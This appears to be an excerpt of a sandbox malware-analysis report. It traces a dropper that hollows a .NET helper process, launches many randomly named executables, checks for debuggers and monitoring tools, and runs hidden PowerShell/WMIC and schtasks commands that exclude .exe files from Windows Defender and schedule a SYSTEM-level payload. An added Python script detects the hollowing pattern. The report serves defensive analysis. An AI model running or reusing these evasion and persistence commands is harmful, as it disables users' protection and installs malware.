                        Source: VtmtVe55Jwcf3rOGIU1yezyh.exe, 00000004.00000003.1624901520.0000000006A49000.00000004.00000020.00020000.00000000.sdmp, yPlMO3UKyKRvoEYPhbGYOyT0.exe, 0000000B.00000003.1635257524.0000000006A39000.00000004.00000020.00020000.00000000.sdmp, B46afLBMY0mokUgVdA9CQR52.exe, 00000013.00000003.1674965384.0000000006B79000.00000004.00000020.00020000.00000000.sdmp, u69w.1.exe, 00000023.00000000.1537903237.000000000041C000.00000020.00000001.01000000.0000001A.sdmpBinary or memory string: Standard without Hyper-V Core
                        Source: B46afLBMY0mokUgVdA9CQR52.exe, 00000013.00000002.1918787360.00000000041ED000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Aapi.dllHyper-V RAW`Q$
                        Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exeSystem information queried: ModuleInformation
                        Source: C:\Users\user\AppData\Local\Temp\u5v8.0.exeProcess information queried: ProcessInformation

                        Anti Debugging

                        Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exeThread information set: HideFromDebugger
                        Source: C:\Users\user\Pictures\wr6XLbv7Ijp4TImjm1ouF4U2.exeThread information set: HideFromDebugger
                        Source: C:\Users\user\Pictures\ka1rT1Ln7XhH1aQSgOeo3013.exeThread information set: HideFromDebugger
                        Source: C:\Users\user\Documents\SimpleAdobe\F0mqqGl9pK9gdOm2cnZsC1mR.exeThread information set: HideFromDebugger
                        Source: C:\Users\user\Documents\SimpleAdobe\F0mqqGl9pK9gdOm2cnZsC1mR.exeOpen window title or class name: regmonclass
                        Source: C:\Users\user\Documents\SimpleAdobe\F0mqqGl9pK9gdOm2cnZsC1mR.exeOpen window title or class name: gbdyllo
                        Source: C:\Users\user\Documents\SimpleAdobe\F0mqqGl9pK9gdOm2cnZsC1mR.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                        Source: C:\Users\user\Documents\SimpleAdobe\F0mqqGl9pK9gdOm2cnZsC1mR.exeOpen window title or class name: procmon_window_class
                        Source: C:\Users\user\Documents\SimpleAdobe\F0mqqGl9pK9gdOm2cnZsC1mR.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                        Source: C:\Users\user\Documents\SimpleAdobe\F0mqqGl9pK9gdOm2cnZsC1mR.exeOpen window title or class name: ollydbg
                        Source: C:\Users\user\Documents\SimpleAdobe\F0mqqGl9pK9gdOm2cnZsC1mR.exeOpen window title or class name: filemonclass
                        Source: C:\Users\user\Documents\SimpleAdobe\F0mqqGl9pK9gdOm2cnZsC1mR.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                        Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exeProcess queried: DebugPort
                        Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exeProcess queried: DebugObjectHandle
                        Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exeProcess queried: DebugPort
                        Source: C:\Users\user\Pictures\wr6XLbv7Ijp4TImjm1ouF4U2.exeProcess queried: DebugPort
                        Source: C:\Users\user\Pictures\wr6XLbv7Ijp4TImjm1ouF4U2.exeProcess queried: DebugObjectHandle
                        Source: C:\Users\user\Pictures\wr6XLbv7Ijp4TImjm1ouF4U2.exeProcess queried: DebugPort
                        Source: C:\Users\user\Pictures\ka1rT1Ln7XhH1aQSgOeo3013.exeProcess queried: DebugPort
                        Source: C:\Users\user\Pictures\ka1rT1Ln7XhH1aQSgOeo3013.exeProcess queried: DebugObjectHandle
                        Source: C:\Users\user\Pictures\ka1rT1Ln7XhH1aQSgOeo3013.exeProcess queried: DebugPort
                        Source: C:\Users\user\Documents\SimpleAdobe\F0mqqGl9pK9gdOm2cnZsC1mR.exeProcess queried: DebugPort
                        Source: C:\Users\user\Documents\SimpleAdobe\F0mqqGl9pK9gdOm2cnZsC1mR.exeProcess queried: DebugObjectHandle
                        Source: C:\Users\user\Documents\SimpleAdobe\F0mqqGl9pK9gdOm2cnZsC1mR.exeProcess queried: DebugPort
                        Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exeCode function: 4_2_0041919A LdrInitializeThunk,4_2_0041919A
                        Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exeCode function: 4_2_00409A73 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_00409A73
                        Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exeCode function: 4_2_004139E7 mov eax, dword ptr fs:[00000030h]4_2_004139E7
                        Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exeCode function: 4_2_040CC5B3 push dword ptr fs:[00000030h]4_2_040CC5B3
                        Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exeCode function: 4_2_05BD0D90 mov eax, dword ptr fs:[00000030h]4_2_05BD0D90
                        Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exeCode function: 4_2_05BD092B mov eax, dword ptr fs:[00000030h]4_2_05BD092B
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeCode function: 11_2_004139E7 mov eax, dword ptr fs:[00000030h]11_2_004139E7
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeCode function: 11_2_0411C5B3 push dword ptr fs:[00000030h]11_2_0411C5B3
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeCode function: 11_2_05BB0D90 mov eax, dword ptr fs:[00000030h]11_2_05BB0D90
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeCode function: 11_2_05BC3C4E mov eax, dword ptr fs:[00000030h]11_2_05BC3C4E
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeCode function: 11_2_05BB092B mov eax, dword ptr fs:[00000030h]11_2_05BB092B
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeCode function: 19_2_004139E7 mov eax, dword ptr fs:[00000030h]19_2_004139E7
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeCode function: 19_2_0418C5B3 push dword ptr fs:[00000030h]19_2_0418C5B3
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeCode function: 19_2_05CE0D90 mov eax, dword ptr fs:[00000030h]19_2_05CE0D90
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeCode function: 19_2_05CF3C4E mov eax, dword ptr fs:[00000030h]19_2_05CF3C4E
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeCode function: 19_2_05CE092B mov eax, dword ptr fs:[00000030h]19_2_05CE092B
                        Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exeCode function: 21_2_004139E7 mov eax, dword ptr fs:[00000030h]21_2_004139E7
                        Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exeCode function: 21_2_041D3C4E mov eax, dword ptr fs:[00000030h]21_2_041D3C4E
                        Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exeCode function: 21_2_041C0D90 mov eax, dword ptr fs:[00000030h]21_2_041C0D90
                        Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exeCode function: 21_2_041C092B mov eax, dword ptr fs:[00000030h]21_2_041C092B
                        Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exeCode function: 21_2_0434C5B3 push dword ptr fs:[00000030h]21_2_0434C5B3
                        Source: C:\Users\user\AppData\Local\Temp\Qg_Appv5.exeCode function: 24_2_0040F124 mov eax, dword ptr fs:[00000030h]24_2_0040F124
                        Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exeCode function: 4_2_00420C1A GetProcessHeap,4_2_00420C1A
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess token adjusted: Debug
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF6385C6E20 RtlAddVectoredExceptionHandler,0_2_00007FF6385C6E20
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF63862B514 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00007FF63862B514
                        Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exeCode function: 4_2_00409A73 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_00409A73
                        Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exeCode function: 4_2_00409C06 SetUnhandledExceptionFilter,4_2_00409C06
                        Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exeCode function: 4_2_00409EBE SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_00409EBE
                        Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exeCode function: 4_2_0041073B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_0041073B
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeCode function: 11_2_00409A73 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,11_2_00409A73
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeCode function: 11_2_00409C06 SetUnhandledExceptionFilter,11_2_00409C06
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeCode function: 11_2_00409EBE SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,11_2_00409EBE
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeCode function: 11_2_0041073B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,11_2_0041073B
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeCode function: 11_2_05BB9CDA IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,11_2_05BB9CDA
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeCode function: 11_2_05BB9E6D SetUnhandledExceptionFilter,11_2_05BB9E6D
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeCode function: 11_2_05BC09A2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,11_2_05BC09A2
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeCode function: 11_2_05BBA125 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,11_2_05BBA125
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeCode function: 19_2_00409A73 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,19_2_00409A73
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeCode function: 19_2_00409C06 SetUnhandledExceptionFilter,19_2_00409C06
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeCode function: 19_2_00409EBE SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,19_2_00409EBE
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeCode function: 19_2_0041073B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,19_2_0041073B
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeCode function: 19_2_05CE9CDA IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,19_2_05CE9CDA
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeCode function: 19_2_05CE9E6D SetUnhandledExceptionFilter,19_2_05CE9E6D
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeCode function: 19_2_05CF09A2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,19_2_05CF09A2
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeCode function: 19_2_05CEA125 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,19_2_05CEA125
                        Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exeCode function: 21_2_00409A73 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,21_2_00409A73
                        Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exeCode function: 21_2_00409C06 SetUnhandledExceptionFilter,21_2_00409C06
                        Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exeCode function: 21_2_00409EBE SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,21_2_00409EBE
                        Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exeCode function: 21_2_0041073B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,21_2_0041073B
                        Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exeCode function: 21_2_041C9CDA IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,21_2_041C9CDA
                        Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exeCode function: 21_2_041C9E6D SetUnhandledExceptionFilter,21_2_041C9E6D
                        Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exeCode function: 21_2_041CA125 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,21_2_041CA125
                        Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exeCode function: 21_2_041D09A2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,21_2_041D09A2
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeMemory allocated: page read and write | page guard

                        HIPS / PFW / Operating System Protection Evasion

                        Source: C:\Users\user\Desktop\file.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000 protect: page execute and read and write
                        Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exeRegistry value deleted: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\group policy objects\{AF4B7D10-C04F-40BD-A9F0-1F789BBF0FCA}Machine\SOFTWARE\Policies\Microsoft\Windows Defender DisableAntiSpyware
                        Source: C:\Users\user\Documents\SimpleAdobe\F0mqqGl9pK9gdOm2cnZsC1mR.exeRegistry value deleted: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\group policy objects\{3FAACE9B-0B9D-4D37-90B5-C9D5F39DABA7}Machine\SOFTWARE\Policies\Microsoft\Windows Defender DisableAntiSpyware
                        Source: C:\Users\user\Pictures\ka1rT1Ln7XhH1aQSgOeo3013.exeNtQuerySystemInformation: Indirect: 0x1406173E4
                        Source: C:\Users\user\Pictures\ka1rT1Ln7XhH1aQSgOeo3013.exeNtSetInformationThread: Indirect: 0x14066CAF7
                        Source: C:\Users\user\AppData\Local\Temp\Qg_Appv5.exeNtQuerySystemInformation: Direct from: 0x456867
                        Source: C:\Users\user\Pictures\ka1rT1Ln7XhH1aQSgOeo3013.exeNtQueryInformationProcess: Indirect: 0x140662896
                        Source: C:\Users\user\Pictures\ka1rT1Ln7XhH1aQSgOeo3013.exeNtQueryInformationProcess: Indirect: 0x140683C42
                        Source: C:\Users\user\AppData\Local\Temp\Qg_Appv5.exeNtQuerySystemInformation: Direct from: 0x6169D145
Source: C:\Users\user\Desktop\file.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\Desktop\file.exe | Section unmapped: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base address: 400000
Source: C:\Users\user\Desktop\file.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000
Source: C:\Users\user\Desktop\file.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 402000
Source: C:\Users\user\Desktop\file.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 404000
Source: C:\Users\user\Desktop\file.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 406000
Source: C:\Users\user\Desktop\file.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 6C2008
Source: C:\Users\user\Desktop\file.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
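The entries above are the raw trace of process hollowing: file.exe starts the legitimate .NET helper AddInProcess32.exe, unmaps the section at its image base (400000) and writes a buffer that begins with the PE magic 4D5A ("MZ") back at that same base, followed by further writes into the now-foreign image. The following is an added example, not part of the Joe Sandbox report, that correlates such events into a verdict. The input lines are constructed from the entries above with a " | " separator between the Source and behaviour columns; that layout, and identifying processes by image path (the report lists no PIDs), are assumptions of the example.

```python
"""Correlate sandbox memory events into a process-hollowing verdict.

Added example (not part of the Joe Sandbox report). The event lines are
constructed from the report's own entries, written as
'Source: <injector> | <behaviour>: <detail>'; that column layout and the
use of image paths as process identity (the report lists no PIDs) are
assumptions of this example."""
import re
from collections import defaultdict

# Constructed sample: the report's file.exe -> AddInProcess32.exe entries,
# plus one unrelated write that must not be flagged.
SAMPLE_EVENTS = r"""
Source: C:\Users\user\Desktop\file.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
Source: C:\Users\user\Desktop\file.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\Desktop\file.exe | Section unmapped: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base address: 400000
Source: C:\Users\user\Desktop\file.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000
Source: C:\Users\user\Desktop\file.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 402000
Source: C:\Users\user\Desktop\file.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 404000
Source: C:\Users\user\Desktop\file.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 406000
Source: C:\Users\user\Desktop\file.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 6C2008
Source: C:\Users\user\Desktop\file.exe | Memory written: C:\Windows\System32\notepad.exe base: 1A0000
"""

EVENT_RE = re.compile(
    r"^Source: (?P<src>.+?) \| (?P<kind>Process created|Section unmapped|Memory written): (?P<rest>.*)$")
UNMAP_RE = re.compile(r"^(?P<target>.+?) base address: (?P<base>[0-9A-Fa-f]+)$")
WRITE_RE = re.compile(
    r"^(?P<target>.+?) base: (?P<base>[0-9A-Fa-f]+)(?: value starts with: (?P<magic>[0-9A-Fa-f]+))?$")
CREATE_RE = re.compile(r'^(?P<target>.+?) "')


def parse_events(text):
    """Yield (injector, target, kind, base, magic) tuples; base is an int or None."""
    for line in text.splitlines():
        m = EVENT_RE.match(line.strip())
        if not m:
            continue
        src, kind, rest = m["src"], m["kind"], m["rest"]
        if kind == "Section unmapped":
            d = UNMAP_RE.match(rest)
            if d:
                yield src, d["target"], kind, int(d["base"], 16), None
        elif kind == "Memory written":
            d = WRITE_RE.match(rest)
            if d:
                yield src, d["target"], kind, int(d["base"], 16), d["magic"]
        else:
            d = CREATE_RE.match(rest)
            if d:
                yield src, d["target"], kind, None, None


def detect_hollowing(text):
    """One finding per (injector, target) pair showing the hollowing triad:
    the injector spawned the target, unmapped a section at some base, and
    wrote a buffer beginning with the PE magic 4D5A ('MZ') at that same base.
    A write elsewhere, or an 'MZ' write without the unmap, is not counted."""
    state = defaultdict(lambda: {"created": False, "unmapped": set(), "mz": set(), "writes": 0})
    for src, target, kind, base, magic in parse_events(text):
        s = state[(src, target)]
        if kind == "Process created":
            s["created"] = True
        elif kind == "Section unmapped":
            s["unmapped"].add(base)
        else:
            s["writes"] += 1
            if magic and magic.upper().startswith("4D5A"):
                s["mz"].add(base)
    findings = []
    for (src, target), s in state.items():
        hollowed = s["unmapped"] & s["mz"]
        if s["created"] and hollowed:
            findings.append({
                "injector": src,
                "target": target,
                "image_base": hex(min(hollowed)),
                "writes": s["writes"],
            })
    return findings


if __name__ == "__main__":
    for f in detect_hollowing(SAMPLE_EVENTS):
        print(f"hollowing: {f['injector']} -> {f['target']} at {f['image_base']} ({f['writes']} writes)")
```

The rule deliberately requires all three events on the same injector/target pair: a lone "MZ" write into a foreign process is still PE injection, but without the unmap at the image base it is not hollowing, and the sandbox's non-chronological listing is why the correlation is order-independent.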
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Process created: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exe "C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Process created: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exe "C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Process created: C:\Users\user\Pictures\i7gUU3MlvTwbsK8r3hAjzW0p.exe "C:\Users\user\Pictures\i7gUU3MlvTwbsK8r3hAjzW0p.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Process created: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exe "C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Process created: C:\Users\user\Pictures\l0nXYBHJHVq6UHyy1YDO9fn3.exe "C:\Users\user\Pictures\l0nXYBHJHVq6UHyy1YDO9fn3.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Process created: C:\Users\user\Pictures\wr6XLbv7Ijp4TImjm1ouF4U2.exe "C:\Users\user\Pictures\wr6XLbv7Ijp4TImjm1ouF4U2.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Process created: C:\Users\user\Pictures\PA8JWMmRYiQsN7iqTjOvjsbW.exe "C:\Users\user\Pictures\PA8JWMmRYiQsN7iqTjOvjsbW.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Process created: C:\Users\user\Pictures\zUOgRazdYnb35XHU4UIsV9Yc.exe "C:\Users\user\Pictures\zUOgRazdYnb35XHU4UIsV9Yc.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Process created: C:\Users\user\Pictures\6dpl9L7LbyabhVQNXZXXKjGL.exe "C:\Users\user\Pictures\6dpl9L7LbyabhVQNXZXXKjGL.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Process created: C:\Users\user\Pictures\0FR80IiNvxJZyXnpOgiDlYNV.exe "C:\Users\user\Pictures\0FR80IiNvxJZyXnpOgiDlYNV.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Process created: C:\Users\user\Pictures\68bEfZA6FBu6lC5BaADYSIdx.exe "C:\Users\user\Pictures\68bEfZA6FBu6lC5BaADYSIdx.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Process created: C:\Users\user\Pictures\ikL90ODaFTS7N6FbOffM2D1B.exe "C:\Users\user\Pictures\ikL90ODaFTS7N6FbOffM2D1B.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Process created: C:\Users\user\Pictures\ka1rT1Ln7XhH1aQSgOeo3013.exe "C:\Users\user\Pictures\ka1rT1Ln7XhH1aQSgOeo3013.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Process created: C:\Users\user\Pictures\G3pV8gTsWQBVrGpK4ooPrlxI.exe "C:\Users\user\Pictures\G3pV8gTsWQBVrGpK4ooPrlxI.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Process created: C:\Users\user\Pictures\vU4jsQbpuBQoMcavMx7b1jzX.exe "C:\Users\user\Pictures\vU4jsQbpuBQoMcavMx7b1jzX.exe" --silent --allusers=0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Process created: C:\Users\user\Pictures\OYqxk9G3x4R05N4I0KLZXbXg.exe "C:\Users\user\Pictures\OYqxk9G3x4R05N4I0KLZXbXg.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Process created: C:\Users\user\Pictures\nxx62MIcAq1mLUazdUlt2emv.exe "C:\Users\user\Pictures\nxx62MIcAq1mLUazdUlt2emv.exe" --silent --allusers=0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Process created: unknown unknown (43 identical entries)
Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exe | Process created: C:\Users\user\AppData\Local\Temp\u5v8.0.exe "C:\Users\user\AppData\Local\Temp\u5v8.0.exe"
Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exe | Process created: C:\Users\user\AppData\Local\Temp\Qg_Appv5.exe "C:\Users\user\AppData\Local\Temp\Qg_Appv5.exe"
Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exe | Process created: unknown unknown
Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exe | Process created: C:\Users\user\AppData\Local\Temp\u69w.0.exe "C:\Users\user\AppData\Local\Temp\u69w.0.exe"
Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exe | Process created: C:\Users\user\AppData\Local\Temp\u69w.1.exe "C:\Users\user\AppData\Local\Temp\u69w.1.exe"
Source: C:\Users\user\AppData\Local\Temp\7zS1198.tmp\Install.exe | Process created: C:\Windows\SysWOW64\forfiles.exe "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
Source: C:\Users\user\AppData\Local\Temp\7zS1198.tmp\Install.exe | Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /CREATE /TN "bWycNackLSywaqkmgR" /SC once /ST 21:38:00 /RU "SYSTEM" /TR "\"C:\Users\user\AppData\Local\Temp\JMPZeWvHhArmqROvY\NwfPJCCpQqPYDzK\koEMGMU.exe\" em /VNsite_idnLd 385118 /S" /V1 /F
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\wbem\WMIC.exe "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exe | Process created: C:\Users\user\AppData\Local\Temp\u4dc.0.exe "C:\Users\user\AppData\Local\Temp\u4dc.0.exe"
Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exe | Process created: unknown unknown
Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exe | Process created: unknown unknown (2 identical entries)
Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\user\AppData\Local\H6XhhPCeuwAb2QQK3C3B1Lwl.exe "C:\Users\user\AppData\Local\H6XhhPCeuwAb2QQK3C3B1Lwl.exe"
Source: C:\Users\user\AppData\Local\Temp\Qg_Appv5.exe | Process created: unknown unknown
Source: C:\Users\user\AppData\Local\H6XhhPCeuwAb2QQK3C3B1Lwl.exe | Process created: unknown unknown (2 identical entries)
Source: C:\Users\user\Pictures\l0nXYBHJHVq6UHyy1YDO9fn3.exe | Process created: unknown unknown (2 identical entries)
